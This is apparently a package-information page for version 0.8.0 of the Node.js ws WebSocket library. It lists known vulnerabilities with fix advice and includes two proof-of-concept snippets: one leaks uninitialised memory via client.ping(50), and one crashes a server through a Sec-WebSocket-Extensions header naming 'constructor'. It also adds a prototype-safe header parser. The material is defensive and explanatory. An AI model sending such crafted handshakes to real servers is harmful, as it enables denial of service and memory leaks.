ws version 0.8.0 is a minor update to the popular WebSocket library for Node.js, building on the solid foundation of version 0.7.2. Both versions aim to provide a simple, fast, and thoroughly tested implementation of the WebSocket protocol (RFC 6455). The key differences lie in updated dependencies, specifically the native modules that speed up buffer handling: bufferutil and utf-8-validate move from the 1.1.x releases used by 0.7.2 to 1.2.x in 0.8.0. These updates likely include performance improvements and bug fixes.
For developers, this means that upgrading to 0.8.0 offers the potential for better performance, especially in scenarios involving high-volume WebSocket traffic or heavy encoding and decoding of message data. These native modules are crucial for efficient buffer manipulation and UTF-8 validation, common tasks when handling WebSocket messages. Although the core API and functionality remain consistent, users should test their applications after upgrading and confirm that their Node.js version is compatible with the new releases of bufferutil and utf-8-validate. The update was released on August 21, 2015, a few months after version 0.7.2 (May 14, 2015), indicating a relatively quick maintenance cycle addressing potential issues and optimizing performance.
All vulnerabilities affecting version 0.8.0 of the package
Remote Memory Disclosure in ws
Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
var ws = require('ws')
var server = new ws.Server({ port: 9000 }) // answers pings automatically, echoing the payload
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes
  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // the echoed ping payload: on vulnerable ws, uninitialised memory
  })
})
Update to version 1.0.1 or greater.
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming WebSocket payloads, which may result in a denial of service condition when the Node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxPayload option for the ws server to a value smaller than 256 MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'
  // Raw opening handshake whose extensions header names an Object.prototype property.
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
Update to version 3.3.1 or later.
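For contrast with the crafted header above, here is an added example (not ws's own code) of a Sec-WebSocket-Extensions parser that cannot be tripped by Object.prototype names: every lookup table is a null-prototype object, so "constructor" or "__proto__" are just keys, and a malformed header is rejected with a 400 rather than crashing the process. TOKEN_RE, parseParam, parseExtensions and negotiate are names chosen for this illustration, and the 101/400 status values stand in for a real handshake response.

```javascript
// Added example, not ws project code: a prototype-safe Sec-WebSocket-Extensions parser
// (RFC 6455 section 9.1). Maps use Object.create(null), so "constructor" or "__proto__"
// are ordinary own keys. Assumption: quoted-string values contain no ',' or ';'.
const TOKEN_RE = /^[!#$%&'*+\-.0-9A-Z^_`a-z|~]+$/; // RFC 7230 token characters

// Parse one "name[=value]" parameter; a valueless parameter maps to true.
function parseParam(raw) {
  const eq = raw.indexOf('=');
  const name = (eq === -1 ? raw : raw.slice(0, eq)).trim();
  if (!TOKEN_RE.test(name)) throw new SyntaxError(`bad parameter name: "${name}"`);
  if (eq === -1) return [name, true];
  const value = raw.slice(eq + 1).trim();
  const quoted = value.length >= 2 && value.startsWith('"') && value.endsWith('"');
  if (!quoted && !TOKEN_RE.test(value)) throw new SyntaxError(`bad parameter value: "${value}"`);
  return [name, quoted ? value.slice(1, -1).replace(/\\(.)/g, '$1') : value]; // unescape quoted-string
}

// Returns a null-prototype map: extension name -> list of offers, each offer a
// null-prototype map of parameter name -> value. Throws SyntaxError if malformed.
function parseExtensions(header) {
  const offers = Object.create(null);
  for (const element of header.split(',')) {
    const [name, ...parts] = element.split(';').map((p) => p.trim());
    if (name === '') { // empty list elements are tolerated, orphan parameters are not
      if (parts.some((p) => p !== '')) throw new SyntaxError('parameter without extension');
      continue;
    }
    if (!TOKEN_RE.test(name)) throw new SyntaxError(`bad extension name: "${name}"`);
    const params = Object.create(null);
    for (const p of parts) {
      if (p === '') continue;
      const [k, v] = parseParam(p);
      if (k in params) throw new SyntaxError(`duplicate parameter: "${k}"`);
      params[k] = v;
    }
    if (!(name in offers)) offers[name] = [];
    offers[name].push(params);
  }
  return offers;
}

// Handshake helper: a malformed header yields a 400 instead of an uncaught exception.
function negotiate(header) {
  try {
    return { status: 101, offers: parseExtensions(header) };
  } catch (err) {
    if (!(err instanceof SyntaxError)) throw err;
    return { status: 400, offers: null };
  }
}
```

With a plain `{}` in place of `Object.create(null)`, `offers['constructor']` would resolve to `Object.prototype.constructor` and the `.push` call would throw, which is the failure class the advisory describes.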